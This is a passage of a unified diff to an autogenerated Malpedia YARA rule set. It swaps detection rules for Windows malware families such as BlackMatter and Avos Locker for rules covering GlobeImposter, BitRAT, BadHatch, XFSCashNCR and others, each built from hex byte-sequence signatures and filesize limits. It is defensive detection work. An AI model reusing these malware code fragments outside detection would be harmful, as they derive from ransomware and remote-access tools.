-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.virdetdoor_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.globeimposter_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "1295e76b0307a288c9ca8e40bd8de47b87983bee24b0a3d67ad5ac1b80c8e6e1"
+		logic_hash = "f943f3ca79204de3fa7ffd520d4eead395fff4b80988c5a103deba289f7c4696"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139888,32 +140460,32 @@ rule MALPEDIA_Win_Virdetdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 6a3d 33db 5f ff7508 8d041f 99 }
-		$sequence_1 = { 8bd7 53 8bce 8903 e8???????? 83c40c }
-		$sequence_2 = { e8???????? 668b45ec 8b55f8 59 }
-		$sequence_3 = { 83ee01 753e 85ff 7524 390b 7720 }
-		$sequence_4 = { e8???????? ebe3 46 897508 3bb3b0020000 0f8cc1feffff eb13 }
-		$sequence_5 = { 7514 81f980000000 720c 85d2 }
-		$sequence_6 = { 83feff 7424 6a00 6800100000 33d2 8bce }
-		$sequence_7 = { c7063e000000 e9???????? c70643000000 e9???????? 803c073a }
-		$sequence_8 = { 83f83a 0f87ce010000 ff24859e414000 c60102 e9???????? c60101 }
-		$sequence_9 = { 7524 390b 7720 3903 }
+		$sequence_0 = { 0fd4e5 0f7e4f0c 0f73d120 0fd4ca }
+		$sequence_1 = { 33db 8b7d04 85ff 7413 8b4508 8d04b8 }
+		$sequence_2 = { ff15???????? 03c7 50 ff15???????? 85c0 743b 8b7c2410 }
+		$sequence_3 = { 43 85d2 7e18 8d4e7c 8b41fc 3b01 }
+		$sequence_4 = { 0f6e6614 0ff4e0 0fd4cb 0f6e7618 0ff4f0 0f7e4f04 0f73d120 }
+		$sequence_5 = { 750b ff15???????? 6ac4 58 eb0a ff15???????? }
+		$sequence_6 = { 5e eb05 b800afffff 5f }
+		$sequence_7 = { ff15???????? 6ac4 58 eb0a ff15???????? 8937 }
+		$sequence_8 = { 8bd0 85d2 7514 8b4608 8d0ca8 0119 3919 }
+		$sequence_9 = { ff742440 e8???????? 83c40c 8bc5 eb03 6ac4 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Blackmatter_Auto : FILE
+rule MALPEDIA_Win_Collection_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7e457194-4a19-57a3-89ac-b5153afc0744"
+		id = "1b2d65a3-063f-5da2-afcb-bd2cf7ccde3f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackmatter_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.collection_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.collection_rat_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "c5598bfcc346f3d5f3d24c66f49b6d8b4e14cf3a3802140e28639e017dd52693"
+		logic_hash = "a7a889a1cf63b732a0e6294d85395ab72d5994c8a4737c39e94d8d81761fea64"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139927,32 +140499,32 @@ rule MALPEDIA_Win_Blackmatter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f803 7409 83f802 0f857c010000 e8???????? 83f83d }
-		$sequence_1 = { c20400 55 8bec 83c4f0 53 c745fc00000000 c745f800000000 }
-		$sequence_2 = { 837dd800 7505 e9???????? 68???????? e8???????? }
-		$sequence_3 = { 75df 8bc2 5e 5a 5d }
-		$sequence_4 = { 8945f0 837df000 0f8491000000 ff75f4 ff75f0 }
-		$sequence_5 = { 50 8d4302 50 e8???????? a3???????? 6a40 8d85fcfeffff }
-		$sequence_6 = { 7429 8d85f8feffff 50 ff15???????? 85c0 }
-		$sequence_7 = { 72df 807d085a 77df b802000000 5d c20400 55 }
-		$sequence_8 = { 6a00 ff15???????? 8945f0 ff75f4 }
-		$sequence_9 = { f7f1 92 3b4508 720b 3b450c }
+		$sequence_0 = { 448928 498b4f10 4885c9 7405 e8???????? }
+		$sequence_1 = { 4c8bc0 4889442450 eb05 4c8b442450 }
+		$sequence_2 = { 488b05???????? 488b4808 488b4930 4883c110 e8???????? 488b05???????? }
+		$sequence_3 = { e8???????? 4883c604 448bc7 488bd6 488bc8 488bd8 }
+		$sequence_4 = { 85c0 7461 e9???????? 488b9540070000 4c8d0590980000 }
+		$sequence_5 = { 84c0 740a 458b949be4350200 eb08 458b949bac350200 448d47ff }
+		$sequence_6 = { 488913 498bfe 895308 4d3bf4 0f8364010000 448a2f 4c8d35843b0100 }
+		$sequence_7 = { 41b806000000 488d15d7390100 483950f0 740b 488b10 4885d2 7403 }
+		$sequence_8 = { 89442420 4c8b8c2480110000 4533c0 8bd3 8d4fe9 e8???????? }
+		$sequence_9 = { 488bc8 bac8000000 e8???????? 488bd0 41b810000000 488bcb 4883c420 }
 
 	condition:
-		7 of them and filesize < 194560
+		7 of them and filesize < 397312
 }
-rule MALPEDIA_Win_Vohuk_Auto : FILE
+rule MALPEDIA_Win_Miragefox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3b59df29-d94c-5e14-b293-d94b874e6f12"
+		id = "8bf05d8f-c582-5717-9f26-33fdbc027523"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vohuk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vohuk_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.miragefox_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "a782dfb427f32a7fe3f5e7a12676df6b8f0aca1f4f78c54f0e9a25741f4d58aa"
+		logic_hash = "fae00ba596fafa75e5c73049938b7e9042d943cf7a2a8e03f73ab30fb5fff604"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139966,32 +140538,32 @@ rule MALPEDIA_Win_Vohuk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { be8d000000 8b45c4 83c30c 40 }
-		$sequence_1 = { ba4786ac2e 6a21 e8???????? 57 ffd0 8b0d???????? ba4786ac2e }
-		$sequence_2 = { e8???????? 6801000100 6a08 56 ffd0 8b0d???????? ba0decbfd2 }
-		$sequence_3 = { 8b857cfeffff 668985fcfeffff 8b8578feffff 668985fefeffff 8b8574feffff 66898500ffffff 8b8570feffff }
-		$sequence_4 = { 8b8570ffffff 668985ccfeffff b8b8000000 668985cefeffff 668985d2feffff 8b856cffffff 668985d4feffff }
-		$sequence_5 = { c745e49700c500 c745e882008200 c745ec86008000 c745f08f008f00 c745f4d600cd00 c745f8cb008300 c745fc8300f100 }
-		$sequence_6 = { 03c2 0fbec0 6bc073 040c 02c1 30440dd0 41 }
-		$sequence_7 = { 69c0f6000000 2bc8 81c1cc000000 66318c74ea000000 46 83fe27 72d1 }
-		$sequence_8 = { 6a22 e8???????? 68???????? 53 ffd0 8b7d90 8b7510 }
-		$sequence_9 = { 8bec 81ec5c080000 8d45a8 ba44000000 56 8bf1 c60000 }
+		$sequence_0 = { 50 e8???????? 83c424 8d85f877ffff b9???????? 8975fc }
+		$sequence_1 = { ffd6 ff750c 8bf0 57 }
+		$sequence_2 = { 68???????? 50 e8???????? 8bf8 33db 59 3bfb }
+		$sequence_3 = { 89b5087cffff 50 e8???????? 03bd187cffff e9???????? }
+		$sequence_4 = { c1f905 83e01f 8b0c8d20f52a00 8d04c0 f644810401 741d }
+		$sequence_5 = { 33c0 85db 7e08 000438 40 }
+		$sequence_6 = { 8945e8 53 8d85a873ffff 56 50 e8???????? 53 }
+		$sequence_7 = { 8b45f0 6808880000 2b45ec 53 }
+		$sequence_8 = { 83f8ff 8945fc 0f84e1000000 bf14410000 8d85d4beffff 57 53 }
+		$sequence_9 = { 2900 55 8bec 81ec48030000 53 }
 
 	condition:
-		7 of them and filesize < 260096
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Avos_Locker_Auto : FILE
+rule MALPEDIA_Win_Unidentified_096_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9aee42e1-3c32-52f2-9afa-ee2f50391d41"
+		id = "ffd5cfa4-f468-5327-a209-b875a1aa7db9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.avos_locker_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_096"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_096_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "a821f2b32080b52bc69d3070def6e8f696a536519430ac8aacf9142d4b2280c1"
+		logic_hash = "d9d15c86fa946b0e45aa738b5898be2be607aa89def00775e64a1c8735fb15f8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140005,32 +140577,32 @@ rule MALPEDIA_Win_Avos_Locker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85a8f9ffff 50 8d85fcf5ffff 50 8d8514f6ffff 50 83ec18 }
-		$sequence_1 = { 57 8b4d18 85c9 743f 8b4514 3bd9 8b7c2424 }
-		$sequence_2 = { 8d4dc0 e8???????? 8b4df4 64890d00000000 59 5e 8be5 }
-		$sequence_3 = { e8???????? 3b750c 0f8469020000 8b8d54ffffff e9???????? 47 3b7d94 }
-		$sequence_4 = { 2bc6 c1f803 50 e8???????? 895df0 c645fc02 8b13 }
-		$sequence_5 = { 2b4b4c 2b534c 3bd1 8b4c240c 5f 5e 0f9cc0 }
-		$sequence_6 = { c70300000000 c7430400000000 c7430800000000 8b10 8b4804 8945e4 8955e8 }
-		$sequence_7 = { b908000000 894e44 8b0e 8b7e08 3bcf 0f840d010000 80395c }
-		$sequence_8 = { ff75e4 ff75e0 8b01 ff500c 8b55e4 8b75e0 2bd6 }
-		$sequence_9 = { 894e30 c645fc02 8d4dbc e8???????? c745fcffffffff 8bc6 8b4df4 }
+		$sequence_0 = { eb17 b028 a2???????? eb0e }
+		$sequence_1 = { b040 a2???????? eb4d b023 a2???????? eb44 b024 }
+		$sequence_2 = { 48 83e01e 83c060 eb15 85ff }
+		$sequence_3 = { eb5f b021 a2???????? eb56 }
+		$sequence_4 = { 0f9dc0 48 83e032 83c02d }
+		$sequence_5 = { 895108 8b400c 89410c e8???????? 83c410 }
+		$sequence_6 = { 8bf8 8b442420 83c408 3dff000000 741d 8b4c2420 8b54241c }
+		$sequence_7 = { 83f926 5b 0f8750010000 33d2 8a9154174000 ff24952c174000 }
+		$sequence_8 = { 5d 83c44c c21000 55 }
+		$sequence_9 = { f644240c01 7409 8ac1 2c30 a2???????? 6683f96a 723b }
 
 	condition:
-		7 of them and filesize < 1701888
+		7 of them and filesize < 25648
 }
-rule MALPEDIA_Win_Shady_Hammock_Auto : FILE
+rule MALPEDIA_Win_Btcware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "36740afa-cc52-5013-823b-4d67eb5edc24"
+		id = "0a15c264-44c4-5125-8666-5205c4d8e175"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shady_hammock"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shady_hammock_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.btcware_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "fa878708757191f1b63841f4404f6fa30ea9e29c95ad0fe726f8dc83ae6686cd"
+		logic_hash = "f2d147920cfa04deca980bc5278a317aec1f05504da7229422f4351e420db59d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140044,32 +140616,32 @@ rule MALPEDIA_Win_Shady_Hammock_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 480f4de8 4c8bc5 e8???????? 498b07 482bdd }
-		$sequence_1 = { ffc3 3b5f18 72d9 33c0 488b5c2450 }
-		$sequence_2 = { 3b5f18 72d9 33c0 488b5c2450 488b6c2458 488b742460 4883c420 }
-		$sequence_3 = { 48d1e9 482bc1 4c3bf8 77e3 }
-		$sequence_4 = { 4c0f45452f 498b02 488d4d27 48894c2438 488d4d18 }
-		$sequence_5 = { 488d4101 488903 8b4314 488b0b c1e80c a801 }
-		$sequence_6 = { 4803d1 eb03 0fb7d1 498bce ff15???????? }
-		$sequence_7 = { 488bc6 488bd9 482bc2 493bc0 4c0f42c8 4883791810 488bc1 }
-		$sequence_8 = { 7413 4c8bc3 ba01000000 498bcf e8???????? }
-		$sequence_9 = { 66ffc6 663b7706 72cf 488bd7 }
+		$sequence_0 = { 83c404 8b857cffffff c7459000000000 c745940f000000 c6458000 }
+		$sequence_1 = { 6bc930 8b048540d04100 0fb6440828 83e040 5d c3 }
+		$sequence_2 = { ff75e4 ff15???????? 8d45ec 50 6a01 ff75e4 6810660000 }
+		$sequence_3 = { e8???????? a1???????? 40 3d00100000 722a f6c11f 0f85366fffff }
+		$sequence_4 = { 5d c3 8d44241c c7442414ffffffff 50 8d442424 c744242000800000 }
+		$sequence_5 = { 8be5 5d c21000 8b8c2494040000 33c0 5f }
+		$sequence_6 = { 8855ee 0f1f840000000000 8b4610 8b4e14 }
+		$sequence_7 = { ffd3 33d2 33c9 e8???????? 8b35???????? a1???????? }
+		$sequence_8 = { c78564ffffff0f000000 c68550ffffff00 83f810 7245 8b8d38ffffff }
+		$sequence_9 = { 833d????????10 bba0fc8101 a1???????? 0f431d???????? 8a4c3df0 85c0 7416 }
 
 	condition:
-		7 of them and filesize < 635904
+		7 of them and filesize < 458752
 }
-rule MALPEDIA_Win_Mechanical_Auto : FILE
+rule MALPEDIA_Win_Bit_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f58702e9-e83b-59f3-ba4d-4c871c835d79"
+		id = "e331727c-f0b9-570e-98b3-15c7435a6eef"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mechanical_auto.yar#L1-L154"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bit_rat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "94b14ca845d1ee4d0c436cd1fe538aa0afa038eac7ee0713fa70a64141fc5c86"
+		logic_hash = "7643b584b9c6d670261c45703563f4fa44b2a6b3543e3f79d5e148454f73feea"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140083,38 +140655,32 @@ rule MALPEDIA_Win_Mechanical_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d0d7a500000 ff15???????? 4885c0 488be8 }
-		$sequence_1 = { 033485c0e54200 8b45e4 8b00 8906 }
-		$sequence_2 = { 03c7 3bca 72ed 5f }
-		$sequence_3 = { 4983c001 84c9 7409 4983c101 }
-		$sequence_4 = { 0401 3cbe 8844240b 76e2 }
-		$sequence_5 = { 03c1 1bc9 0bc1 59 e9???????? e8???????? ff742404 }
-		$sequence_6 = { 90 0100 e392 0100 c88f0100 }
-		$sequence_7 = { 84c0 0f8409000000 4983c001 4885c9 75e8 4585c0 0f84d0010000 }
-		$sequence_8 = { 3c5a 770a 0420 41b801000000 8802 }
-		$sequence_9 = { 75ed 488d8c2460210000 4d8bc4 6690 }
-		$sequence_10 = { 030495c0e54200 eb05 b8???????? f6400420 }
-		$sequence_11 = { 00686c 42 0023 d18a0688078a }
-		$sequence_12 = { 33c0 488bbc2468010000 488b9c2460010000 488b8c2430010000 }
-		$sequence_13 = { 4885c9 75ec 4585c0 0f84bd010000 }
-		$sequence_14 = { 03ce c6840c3801000000 8d8424a05c0000 33f6 }
-		$sequence_15 = { 033485c0e54200 c745e401000000 33db 395e08 }
+		$sequence_0 = { e8???????? 8b37 8bce 6a01 e8???????? 6a01 8bce }
+		$sequence_1 = { e8???????? 6a30 56 e8???????? 83c408 c645fc07 8b4578 }
+		$sequence_2 = { eb09 6a00 6a00 68a7000000 68a4000000 6a22 e8???????? }
+		$sequence_3 = { f6401408 743e 83790400 7538 3bcd 742d 8b4110 }
+		$sequence_4 = { 8b450c 895ddc 8b5d08 2bdf 1bc1 8b4ddc 8945f0 }
+		$sequence_5 = { 8945fc 8d7e10 51 51 57 8945f0 e8???????? }
+		$sequence_6 = { b9d7505e03 2bc8 83f901 7234 2b1f 8d7001 8bc3 }
+		$sequence_7 = { ff742420 52 e8???????? 83c414 85c0 7422 5f }
+		$sequence_8 = { e8???????? 83c40c 85d2 7f06 7ce5 85c0 72e1 }
+		$sequence_9 = { 8bd7 8d4201 8945f0 8a02 42 84c0 75f9 }
 
 	condition:
-		7 of them and filesize < 434176
+		7 of them and filesize < 19405824
 }
-rule MALPEDIA_Win_Xiangoop_Auto : FILE
+rule MALPEDIA_Win_Badhatch_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6e84a1ce-b3cc-5c7d-80b5-2c2f7136b8d8"
+		id = "129c68ce-5b2e-52de-a1c8-87ec196923a8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiangoop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xiangoop_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badhatch"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.badhatch_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "3a1a5f28cac0124e198da0edd11ac88ef86aa9a350a33831b6bb7ce30756bca1"
+		logic_hash = "d1799db66ba63d047ab24cbcf38644792982827a0f2e3a856828a5d589d13430"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140128,32 +140694,32 @@ rule MALPEDIA_Win_Xiangoop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b45f4 0fb60c08 81e1ff000000 0bd1 b804000000 }
-		$sequence_1 = { 8945ec 837dec00 750e 8b55f8 83c214 8955f8 }
-		$sequence_2 = { 81e2ff000000 8b45f8 c1e808 8b75f8 }
-		$sequence_3 = { 8b55f0 83c204 8955f0 8b45fc 8b4df0 8b11 8910 }
-		$sequence_4 = { 891408 b904000000 6bd103 b804000000 6bc806 8b45fc }
-		$sequence_5 = { 8955f8 837df800 7741 7206 837df40a 7339 8b4d08 }
-		$sequence_6 = { 8b55fc 330c02 894dec e9???????? 8b45dc }
-		$sequence_7 = { c745e408430110 e9???????? 894de0 c745e408430110 e9???????? c745e404430110 e9???????? }
-		$sequence_8 = { 6bc203 8b5510 884c020c 8be5 }
-		$sequence_9 = { 0bc1 ba01000000 d1e2 8b4df4 0fb6541110 81e2ff000000 c1e208 }
+		$sequence_0 = { 85db 7503 8b5f10 03de 8b7710 037508 eb26 }
+		$sequence_1 = { 68???????? ff7718 e9???????? 68???????? 8dbd54dfffff e8???????? 59 }
+		$sequence_2 = { 53 57 68???????? 50 ff15???????? ff761c ff15???????? }
+		$sequence_3 = { 3bca 7619 8b1d???????? 03da 3bcb 730d }
+		$sequence_4 = { 89742434 89742438 8974243c ff15???????? 8bf8 3bfe 0f852f010000 }
+		$sequence_5 = { 6a02 56 ff15???????? 8bc7 5f 5b c9 }
+		$sequence_6 = { ffd6 ff75cc ffd6 895dcc 895dd0 ffb738010000 }
+		$sequence_7 = { 8d8564ffffff 50 ff15???????? 8945dc 83f8ff 7405 895de4 }
+		$sequence_8 = { 81fee0327077 7415 81fedec5c08a 0f851c010000 894c2424 e9???????? }
+		$sequence_9 = { 6a01 8b7d08 8bc7 e8???????? 59 8945e4 85c0 }
 
 	condition:
-		7 of them and filesize < 246784
+		7 of them and filesize < 156672
 }
-rule MALPEDIA_Win_Skyplex_Auto : FILE
+rule MALPEDIA_Win_Avcrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7314bd82-1aa5-5733-8a6b-d66b1f4ce931"
+		id = "00cf27fe-b3f2-52f3-b9ce-ac448ef85802"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.skyplex_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.avcrypt_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "192b51867743844243ec787078ffba7934aed43d773432d484ad42af9f8ba5ed"
+		logic_hash = "ff0922ac16f60a78ce69b391d1f6f13ac39e840f62a7ba24855ffe003dee4073"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140167,32 +140733,32 @@ rule MALPEDIA_Win_Skyplex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7458 8b8df4feffff 51 ff15???????? c785f0feffff00000000 eb0f 8b95f0feffff }
-		$sequence_1 = { 7510 6a00 68???????? ff15???????? 8945fc 837dfc00 }
-		$sequence_2 = { 83c408 e9???????? 68???????? 8d9538f7ffff 52 e8???????? }
-		$sequence_3 = { 7504 b001 eb4f ebc1 c785ecfeffff00000000 eb0f }
-		$sequence_4 = { 33c0 668945f8 8d4df8 51 }
-		$sequence_5 = { e8???????? 50 8d4d0c e8???????? 50 8b4de4 }
-		$sequence_6 = { ff15???????? 83c410 c78560f6ffff00000000 eb0f 8b8560f6ffff 83c001 }
-		$sequence_7 = { 83c408 85c0 7478 68???????? 8d8538f7ffff 50 }
-		$sequence_8 = { 8b45f4 50 ff15???????? 8945f0 6a00 }
-		$sequence_9 = { 6a01 ff15???????? c78544f6ffff01000000 eb0f 8b8d44f6ffff 83c101 898d44f6ffff }
+		$sequence_0 = { 7467 663bdf 7462 837e4000 7515 ff7650 57 }
+		$sequence_1 = { 57 56 8d4d38 e8???????? 57 56 8d4d50 }
+		$sequence_2 = { 85c9 0f88d9090000 8d42e0 3c58 770f 0fbec2 0fbe8058e34200 }
+		$sequence_3 = { e8???????? 59 0fb7c8 b8ffff0000 663bc8 0f8406010000 8bc1 }
+		$sequence_4 = { 7447 8802 42 8b048d80b54300 4e 807d1301 }
+		$sequence_5 = { 8d4d8c c645fc13 e8???????? 68???????? 8d4da4 c645fc14 }
+		$sequence_6 = { 75e2 8b7df4 8937 5e eb05 8b4510 }
+		$sequence_7 = { 895dfc 894dbc 895db8 668945a8 894dd4 895dd0 668945c0 }
+		$sequence_8 = { 8d45d8 0f4345d8 57 50 57 }
+		$sequence_9 = { 8bc6 e8???????? c20400 8b11 83c9ff 83ea10 8d420c }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 6160384
 }
-rule MALPEDIA_Win_Darkcloud_Auto : FILE
+rule MALPEDIA_Win_Unidentified_091_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e059e862-be86-52e7-8da9-3408fec87995"
+		id = "62d0217c-caa8-5a24-836c-be321aa72ae6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkcloud_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_091"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_091_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "dc797d71bdd72f9d3e0bc969cd3f0b1296fdab9f38aa0a923dd640404b9f8c9b"
+		logic_hash = "5a53bb358b4bf07b18385bcb86f5c0c27f228bb0e297f7cd9c02060943441d31"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140206,32 +140772,32 @@ rule MALPEDIA_Win_Darkcloud_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 ff15???????? 8b3d???????? 8b1d???????? 898540ffffff be01000000 3bb540ffffff }
-		$sequence_1 = { 8d8d68ffffff ff15???????? 8d8d68ffffff 51 e8???????? 8bd0 8d8d54ffffff }
-		$sequence_2 = { 6a00 51 8bf0 ff15???????? 50 56 6a00 }
-		$sequence_3 = { 898578ffffff c78570ffffff08000000 8d9570ffffff 8d4dac ff15???????? 8d4d8c 51 }
-		$sequence_4 = { 68???????? ff15???????? 8bd0 8d4dd8 ff15???????? 50 8b4ddc }
-		$sequence_5 = { 50 8d8da0feffff 51 ff15???????? 50 8d9520feffff 52 }
-		$sequence_6 = { 8d4dd4 ff15???????? 8b55cc 89951cffffff c745cc00000000 }
-		$sequence_7 = { 8d4da4 898de8feffff eb09 8d55a4 8995e8feffff 8b85e8feffff 8b08 }
-		$sequence_8 = { 53 56 57 8965f4 c745f8???????? 8b5d08 33ff }
-		$sequence_9 = { 50 c78558ffffff80514000 899d50ffffff ffd7 8d8d50ffffff 50 8d5580 }
+		$sequence_0 = { 4d034360 488bd7 48c1ca27 4d03c1 4833d1 4c03c6 4d03e0 }
+		$sequence_1 = { e8???????? e9???????? c7442428f3050000 ba0a000000 41b999010000 e9???????? c7442428d9050000 }
+		$sequence_2 = { e8???????? 8b5340 8910 ff4304 e8???????? 41b800010000 488d55a0 }
+		$sequence_3 = { 85c0 7529 803e2c 7524 ba6b000000 c744242027020000 4c8d0d0cd81100 }
+		$sequence_4 = { bf75000000 b85f000000 ba7b000000 89442420 4c8d0da9621100 448bc7 8d4a93 }
+		$sequence_5 = { c1c007 8945ab 8b45db 4103c1 8bd0 33d6 c1c210 }
+		$sequence_6 = { 723a 488b3b 488bd7 e8???????? 488d5601 4881fa00100000 7218 }
+		$sequence_7 = { c3 53 e40d 00ade40d0048 e40d 00b8e40d0000 0303 }
+		$sequence_8 = { 8d48f0 488d1519641100 e8???????? 4885c0 7526 4c8d0d08641100 c744242025000000 }
+		$sequence_9 = { 83f8ff 7407 4803c0 8954c608 89540d9f 488b75cf 4c8b6dd7 }
 
 	condition:
-		7 of them and filesize < 622592
+		7 of them and filesize < 5777408
 }
-rule MALPEDIA_Win_Younglotus_Auto : FILE
+rule MALPEDIA_Win_Xfscashncr_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "511ee3c4-3a8d-5982-a129-c4f520bbe10e"
+		id = "aa68c3d3-6057-5726-9c6a-29c3062e0a39"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.younglotus_auto.yar#L1-L173"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfscashncr"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xfscashncr_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "22c4cfdc7fd425b818daae07117ab2b0a1f6250b75eb7983096dfb11564bd4bb"
+		logic_hash = "8cc1f9194ac942ef01eaad15d7e35adea44a498eaca746d03287f1cf0f22bf7b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140245,38 +140811,32 @@ rule MALPEDIA_Win_Younglotus_Auto : FILE
